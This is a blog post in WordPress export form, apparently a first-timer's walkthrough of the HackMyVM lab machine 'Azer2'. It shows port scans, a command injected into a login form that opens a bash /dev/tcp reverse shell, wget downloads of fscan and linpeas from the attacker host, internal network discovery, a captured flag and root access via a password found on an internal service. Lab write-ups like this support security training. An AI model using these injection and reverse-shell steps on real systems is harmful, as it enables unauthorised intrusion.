{"id":397,"date":"2024-03-16T01:03:49","date_gmt":"2024-03-15T17:03:49","guid":{"rendered":"http:\/\/162.14.82.114\/?p=397"},"modified":"2024-03-17T16:57:33","modified_gmt":"2024-03-17T08:57:33","slug":"hmv-_-azer2","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/397\/03\/16\/2024\/","title":{"rendered":"hmv[-_-]Azer2"},"content":{"rendered":"<h1>Azer2<\/h1>\n<p>Today is my first time trying a <code>hackmyvm<\/code> machine, and I want to try solving it on my own. I open it and get the familiar error:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101883.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101883.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240229005130861\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Ugh. Time to set up the target: first open it with VirtualBox, convert it using the <code>1.0<\/code> format, export an <code>ova<\/code>, then upgrade it with VMware:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101885.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101885.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240314191135124\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101886.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101886.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240314191210177\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Run a scan:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101887.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101887.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240315232356158\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>Found it!<\/p>\n<h2>Information gathering<\/h2>\n<h3>Port scan<\/h3>\n<p>Scan first:<\/p>\n<pre><code class=\"language-bash\">rustscan -a 10.161.61.133 -- -A -sV --script=vuln<\/code><\/pre>\n<pre><code class=\"language-text\">.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 10.161.61.133:80\nOpen 10.161.61.133:3000\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\nWarning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex &#039;^HTTP\/1\\.1 \\d\\d\\d (?:[^\\r\\n]*\\r\\n(?!\\r\\n))*?.*\\r\\nServer: Virata-EmWeb\/R([\\d_]+)\\r\\nContent-Type: text\/html; ?charset=UTF-8\\r\\nExpires: .*&lt;title&gt;HP (Color |)LaserJet ([\\w._ -]+)\u00a0\u00a0\u00a0&#039;\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-15 11:28 EDT\nNSE: Loaded 150 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 2) scan.\nInitiating NSE at 11:28\nCompleted NSE at 11:28, 10.01s elapsed\nNSE: Starting runlevel 2 (of 2) scan.\nInitiating NSE at 11:28\nCompleted NSE at 11:28, 0.00s elapsed\nInitiating Ping Scan at 11:28\nScanning 10.161.61.133 [2 ports]\nCompleted Ping Scan at 11:28, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 11:28\nCompleted Parallel DNS resolution of 1 host. at 11:28, 6.55s elapsed\nDNS resolution of 1 IPs took 6.55s. 
Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]\nInitiating Connect Scan at 11:28\nScanning 10.161.61.133 [2 ports]\nDiscovered open port 80\/tcp on 10.161.61.133\nDiscovered open port 3000\/tcp on 10.161.61.133\nCompleted Connect Scan at 11:28, 0.00s elapsed (2 total ports)\nInitiating Service scan at 11:28\nScanning 2 services on 10.161.61.133\nCompleted Service scan at 11:28, 11.16s elapsed (2 services on 1 host)\nNSE: Script scanning 10.161.61.133.\nNSE: Starting runlevel 1 (of 2) scan.\nInitiating NSE at 11:28\nNSE: [firewall-bypass 10.161.61.133] lacks privileges.\nNSE Timing: About 98.59% done; ETC: 11:29 (0:00:00 remaining)\nNSE Timing: About 98.59% done; ETC: 11:29 (0:00:01 remaining)\nCompleted NSE at 11:29, 66.70s elapsed\nNSE: Starting runlevel 2 (of 2) scan.\nInitiating NSE at 11:29\nNSE: [tls-ticketbleed 10.161.61.133:80] Not running due to lack of privileges.\nCompleted NSE at 11:29, 0.02s elapsed\nNmap scan report for 10.161.61.133\nHost is up, received syn-ack (0.0010s latency).\nScanned at 2024-03-15 11:28:31 EDT for 78s\n\nPORT     STATE SERVICE REASON  VERSION\n80\/tcp   open  http    syn-ack Apache httpd 2.4.57 ((Debian))\n|_http-jsonp-detection: Couldn&#039;t find any JSONP endpoints.\n|_http-server-header: Apache\/2.4.57 (Debian)\n|_http-litespeed-sourcecode-download: Request with null byte did not work. 
This web server might not be vulnerable\n| http-csrf: \n| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.161.61.133\n|   Found the following possible CSRF vulnerabilities: \n|     \n|     Path: http:\/\/10.161.61.133:80\/bagis\/Bagis99bd.html?Deger=500\n|     Form id: frm_bagis\n|     Form action: https:\/\/www.losev.org.tr\/bagis\/GenericVer3RequestHashHandler.aspx\n|     \n|     Path: http:\/\/10.161.61.133:80\/bagis\/Bagis3f19.html?Deger=250\n|     Form id: frm_bagis\n|     Form action: https:\/\/www.losev.org.tr\/bagis\/GenericVer3RequestHashHandler.aspx\n|     \n|     Path: http:\/\/10.161.61.133:80\/bagis\/Bagisfb23.html?Deger=0\n|     Form id: frm_bagis\n|     Form action: https:\/\/www.losev.org.tr\/bagis\/GenericVer3RequestHashHandler.aspx\n|     \n|     Path: http:\/\/10.161.61.133:80\/bagis\/Bagis31df.html?Deger=150\n|     Form id: frm_bagis\n|     Form action: https:\/\/www.losev.org.tr\/bagis\/GenericVer3RequestHashHandler.aspx\n|     \n|     Path: http:\/\/10.161.61.133:80\/bagis\/Bagis5fed.html?Deger=50\n|     Form id: frm_bagis\n|_    Form action: https:\/\/www.losev.org.tr\/bagis\/GenericVer3RequestHashHandler.aspx\n|_http-wordpress-users: [Error] WordPress installation was not found. 
We couldn&#039;t find wp-login.php\n| http-fileupload-exploiter: \n|   \n|_    Couldn&#039;t find a file-type field.\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n| vulners: \n|   cpe:\/a:apache:http_server:2.4.57: \n|       OSV:BIT-APACHE-2023-45802       5.0     https:\/\/vulners.com\/osv\/OSV:BIT-APACHE-2023-45802\n|       OSV:BIT-APACHE-2023-43622       5.0     https:\/\/vulners.com\/osv\/OSV:BIT-APACHE-2023-43622\n|       OSV:BIT-2023-45802      5.0     https:\/\/vulners.com\/osv\/OSV:BIT-2023-45802\n|       OSV:BIT-2023-43622      5.0     https:\/\/vulners.com\/osv\/OSV:BIT-2023-43622\n|       F7F6E599-CEF4-5E03-8E10-FE18C4101E38    5.0     https:\/\/vulners.com\/githubexploit\/F7F6E599-CEF4-5E03-8E10-FE18C4101E38  *EXPLOIT*\n|       E5C174E5-D6E8-56E0-8403-D287DE52EB3F    5.0     https:\/\/vulners.com\/githubexploit\/E5C174E5-D6E8-56E0-8403-D287DE52EB3F  *EXPLOIT*\n|       DB6E1BBD-08B1-574D-A351-7D6BB9898A4A    5.0     https:\/\/vulners.com\/githubexploit\/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A  *EXPLOIT*\n|       CVE-2023-43622  5.0     https:\/\/vulners.com\/cve\/CVE-2023-43622\n|       CVE-2023-31122  5.0     https:\/\/vulners.com\/cve\/CVE-2023-31122\n|       CNVD-2023-93320 5.0     https:\/\/vulners.com\/cnvd\/CNVD-2023-93320\n|       C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B    5.0     https:\/\/vulners.com\/githubexploit\/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B  *EXPLOIT*\n|       BD3652A9-D066-57BA-9943-4E34970463B9    5.0     https:\/\/vulners.com\/githubexploit\/BD3652A9-D066-57BA-9943-4E34970463B9  *EXPLOIT*\n|       B0208442-6E17-5772-B12D-B5BE30FA5540    5.0     https:\/\/vulners.com\/githubexploit\/B0208442-6E17-5772-B12D-B5BE30FA5540  *EXPLOIT*\n|       A820A056-9F91-5059-B0BC-8D92C7A31A52    5.0     https:\/\/vulners.com\/githubexploit\/A820A056-9F91-5059-B0BC-8D92C7A31A52  *EXPLOIT*\n|       9814661A-35A4-5DB7-BB25-A1040F365C81    5.0     
https:\/\/vulners.com\/githubexploit\/9814661A-35A4-5DB7-BB25-A1040F365C81  *EXPLOIT*\n|       5A864BCC-B490-5532-83AB-2E4109BB3C31    5.0     https:\/\/vulners.com\/githubexploit\/5A864BCC-B490-5532-83AB-2E4109BB3C31  *EXPLOIT*\n|       17C6AD2A-8469-56C8-BBBE-1764D0DF1680    5.0     https:\/\/vulners.com\/githubexploit\/17C6AD2A-8469-56C8-BBBE-1764D0DF1680  *EXPLOIT*\n|_      CVE-2023-45802  2.6     https:\/\/vulners.com\/cve\/CVE-2023-45802\n3000\/tcp open  http    syn-ack Node.js (Express middleware)\n|_http-jsonp-detection: Couldn&#039;t find any JSONP endpoints.\n|_http-wordpress-users: [Error] WordPress installation was not found. We couldn&#039;t find wp-login.php\n|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n| http-csrf: \n| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.161.61.133\n|   Found the following possible CSRF vulnerabilities: \n|     \n|     Path: http:\/\/10.161.61.133:3000\/\n|     Form id: username\n|_    Form action: \/login\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 2) scan.\nInitiating NSE at 11:29\nCompleted NSE at 11:29, 0.00s elapsed\nNSE: Starting runlevel 2 (of 2) scan.\nInitiating NSE at 11:29\nCompleted NSE at 11:29, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 95.45 seconds\n<\/code><\/pre>\n<h3>Directory scan<\/h3>\n<p>First, see what is there:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101888.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101888.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240315233948039\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Look around, and run a scan along the way<\/p>\n<pre><code class=\"language-bash\">dirsearch -u http:\/\/10.161.61.133 -e* -i 200,300-399 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -t 200<\/code><\/pre>\n<p>(By the time I had finished the box, the scan still had not turned anything up...)<\/p>\n<h2>Exploitation<\/h2>\n<h3>Looking at port 3000<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101889.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101889.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240315235858025\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>There is a login page; try universal passwords and weak passwords:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101890.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101890.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316001016165\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>It appears to run a shell script, so try popping a reverse shell:<\/p>\n<pre><code class=\"language-bash\">;bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/10.161.61.130\/1234 &lt;&amp;1&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101891.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403160101891.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316002019143\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>The shell came back!<\/p>\n<p>Check the flag!<\/p>\n<pre><code class=\"language-bash\">cat user.txt\n0d2856d69dc348b3af80a0eed67c7502<\/code><\/pre>\n<h2>Privilege escalation<\/h2>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">azer@azer:~$ whoami;id\nwhoami;id\nazer\nuid=1000(azer) gid=1000(azer) groups=1000(azer),100(users)\nazer@azer:~$ uname -a\nuname -a\nLinux azer 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU\/Linux\nazer@azer:~$ lsb_release -a\nlsb_release -a\nDistributor ID: Debian\nDescription:    Debian GNU\/Linux 12 (bookworm)\nRelease:        12\nCodename:       bookworm\nazer@azer:~$ crontab -l\ncrontab -l\nno crontab for azer <\/code><\/pre>\n<h3>Network interface information<\/h3>\n<pre><code class=\"language-text\">1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000                                                                                                          \n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n    inet6 ::1\/128 scope host noprefixroute \n       valid_lft forever preferred_lft forever\n2: ens33: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000\n    link\/ether 00:0c:29:36:f0:b0 brd ff:ff:ff:ff:ff:ff\n    altname enp2s1\n    inet 10.161.61.133\/24 brd 10.161.61.255 scope global dynamic ens33\n       valid_lft 1167sec preferred_lft 1167sec\n    inet6 fe80::20c:29ff:fe36:f0b0\/64 scope link \n       valid_lft forever preferred_lft forever\n3: br-333bcb432cd5: 
&lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default \n    link\/ether 02:42:20:87:b8:aa brd ff:ff:ff:ff:ff:ff\n    inet 10.10.10.1\/24 brd 10.10.10.255 scope global br-333bcb432cd5\n       valid_lft forever preferred_lft forever\n    inet6 fe80::42:20ff:fe87:b8aa\/64 scope link \n       valid_lft forever preferred_lft forever\n4: docker0: &lt;NO-CARRIER,BROADCAST,MULTICAST,UP&gt; mtu 1500 qdisc noqueue state DOWN group default \n    link\/ether 02:42:16:b1:2b:71 brd ff:ff:ff:ff:ff:ff\n    inet 172.17.0.1\/16 brd 172.17.255.255 scope global docker0\n       valid_lft forever preferred_lft forever\n6: veth05e3397@if5: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue master br-333bcb432cd5 state UP group default \n    link\/ether 0e:59:88:7a:96:ad brd ff:ff:ff:ff:ff:ff link-netnsid 0\n    inet6 fe80::c59:88ff:fe7a:96ad\/64 scope link \n       valid_lft forever preferred_lft forever<\/code><\/pre>\n<p>Found a <code>docker<\/code> container.<\/p>\n<p>Tried to look at the docker information, but it was not much use:<\/p>\n<pre><code class=\"language-text\">azer@azer:\/var\/www\/html\/v6$ docker ps -a\ndocker ps -a\npermission denied while trying to connect to the Docker daemon socket at unix:\/\/\/var\/run\/docker.sock: Get &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/containers\/json?all=1&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied\nazer@azer:\/var\/www\/html\/v6$ docker info\ndocker info\nClient: Docker Engine - Community\n Version:    25.0.3\n Context:    default\n Debug Mode: false\n Plugins:\n  buildx: Docker Buildx (Docker Inc.)\n    Version:  v0.12.1\n    Path:     \/usr\/libexec\/docker\/cli-plugins\/docker-buildx\n  compose: Docker Compose (Docker Inc.)\n    Version:  v2.24.5\n    Path:     \/usr\/libexec\/docker\/cli-plugins\/docker-compose\n\nServer:\nERROR: permission denied while trying to connect to the Docker 
daemon socket at unix:\/\/\/var\/run\/docker.sock: Get &quot;http:\/\/%2Fvar%2Frun%2Fdocker.sock\/v1.24\/info&quot;: dial unix \/var\/run\/docker.sock: connect: permission denied\nerrors pretty printing info\n<\/code><\/pre>\n<p>Upload <code>fscan<\/code> to look at the internal network:<\/p>\n<pre><code class=\"language-bash\">azer@azer:\/tmp$ wget 10.161.61.130:8888\/fscan       \nwget 10.161.61.130:8888\/fscan\n--2024-03-15 12:31:30--  http:\/\/10.161.61.130:8888\/fscan\nConnecting to 10.161.61.130:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 24379392 (23M) [application\/octet-stream]\nSaving to: \u2018fscan\u2019\n\nfscan               100%[===================&gt;]  23.25M  26.2MB\/s    in 0.9s    \n\n2024-03-15 12:31:31 (26.2 MB\/s) - \u2018fscan\u2019 saved [24379392\/24379392]\n\nazer@azer:\/tmp$ .\/fscan -h 10.10.10.1\/24\n.\/fscan -h 10.10.10.1\/24\nbash: .\/fscan: Permission denied\nazer@azer:\/tmp$ chmod +x fscan\nchmod +x fscan\nazer@azer:\/tmp$ .\/fscan -h 10.10.10.1\/24\n.\/fscan -h 10.10.10.1\/24\n\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| &#039;__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.3\nstart infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n[*] Icmp alive hosts len is: 0\nstart vulscan\n\u5df2\u5b8c\u6210 0\/0\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 6.226452119s<\/code><\/pre>\n<p>Nothing was found at all, huh. Upload <code>linpeas<\/code> and try that:<\/p>\n<pre><code>azer@azer:\/tmp$ wget http:\/\/10.161.61.130:8888\/linpeas.sh         \nwget http:\/\/10.161.61.130:8888\/linpeas.sh\n--2024-03-15 12:48:43--  http:\/\/10.161.61.130:8888\/linpeas.sh\nConnecting to 10.161.61.130:8888... 
connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 332111 (324K) [text\/x-sh]\nSaving to: \u2018linpeas.sh\u2019\n\nlinpeas.sh          100%[===================&gt;] 324.33K  --.-KB\/s    in 0.04s   \n\n2024-03-15 12:48:43 (7.59 MB\/s) - \u2018linpeas.sh\u2019 saved [332111\/332111]\n\nazer@azer:\/tmp$ chmod +x linpeas.sh\nchmod +x linpeas.sh\nazer@azer:\/tmp$ .\/linpeas.sh<\/code><\/pre>\n<p>Spotted a firewall filter:<\/p>\n<pre><code class=\"language-bash\">[+] Iptables rules\n*filter                                                                                                                                                                                              \n:INPUT ACCEPT [0:0]\n:FORWARD DROP [0:0]\n:OUTPUT ACCEPT [0:0]\n:DOCKER - [0:0]\n:DOCKER-ISOLATION-STAGE-1 - [0:0]\n:DOCKER-ISOLATION-STAGE-2 - [0:0]\n:DOCKER-USER - [0:0]\n-A FORWARD -j DOCKER-USER\n-A FORWARD -j DOCKER-ISOLATION-STAGE-1\n-A FORWARD -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A FORWARD -o docker0 -j DOCKER\n-A FORWARD -i docker0 ! -o docker0 -j ACCEPT\n-A FORWARD -i docker0 -o docker0 -j ACCEPT\n-A FORWARD -o br-333bcb432cd5 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A FORWARD -o br-333bcb432cd5 -j DOCKER\n-A FORWARD -i br-333bcb432cd5 ! -o br-333bcb432cd5 -j ACCEPT\n-A FORWARD -i br-333bcb432cd5 -o br-333bcb432cd5 -j ACCEPT\n-A OUTPUT -p icmp -j DROP\n-A DOCKER-ISOLATION-STAGE-1 -i docker0 ! -o docker0 -j DOCKER-ISOLATION-STAGE-2\n-A DOCKER-ISOLATION-STAGE-1 -i br-333bcb432cd5 ! 
-o br-333bcb432cd5 -j DOCKER-ISOLATION-STAGE-2\n-A DOCKER-ISOLATION-STAGE-1 -j RETURN\n-A DOCKER-ISOLATION-STAGE-2 -o docker0 -j DROP\n-A DOCKER-ISOLATION-STAGE-2 -o br-333bcb432cd5 -j DROP\n-A DOCKER-ISOLATION-STAGE-2 -j RETURN\n-A DOCKER-USER -j RETURN\nCOMMIT\n*nat\n:PREROUTING ACCEPT [0:0]\n:INPUT ACCEPT [0:0]\n:OUTPUT ACCEPT [0:0]\n:POSTROUTING ACCEPT [0:0]\n:DOCKER - [0:0]\n-A PREROUTING -m addrtype --dst-type LOCAL -j DOCKER\n-A OUTPUT ! -d 127.0.0.0\/8 -m addrtype --dst-type LOCAL -j DOCKER\n-A POSTROUTING -s 172.17.0.0\/16 ! -o docker0 -j MASQUERADE\n-A POSTROUTING -s 10.10.10.0\/24 ! -o br-333bcb432cd5 -j MASQUERADE\n-A DOCKER -i docker0 -j RETURN\n-A DOCKER -i br-333bcb432cd5 -j RETURN\nCOMMIT<\/code><\/pre>\n<p>We can see <code>icmp<\/code> is blocked, which means ping cannot work; change the scan to skip the ping and try again:<\/p>\n<pre><code class=\"language-bash\">.\/fscan -h 10.10.10.1\/24 -np -nopoc -noredis <\/code><\/pre>\n<p>Never mind the rest; we only need to find live hosts, so turn off everything that is not needed.<\/p>\n<pre><code class=\"language-text\">start infoscan\n10.10.10.10:80 open\n10.10.10.1:80 open<\/code><\/pre>\n<p>Take a look at it.<\/p>\n<pre><code class=\"language-bash\">azer@azer:~$ curl 10.10.10.10:80\ncurl 10.10.10.10:80\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100    17  100    17    0     0    425      0 --:--:-- --:--:-- --:--:--   435\n.:.AzerBulbul.:.<\/code><\/pre>\n<p>Could this be the flag? Submitting it shows it is not. Try switching to root, and it works!<\/p>\n<pre><code class=\"language-bash\">azer@azer:~$ su root\nsu root\nPassword: .:.AzerBulbul.:.\nwhoami;id\nroot\nuid=0(root) gid=0(root) 
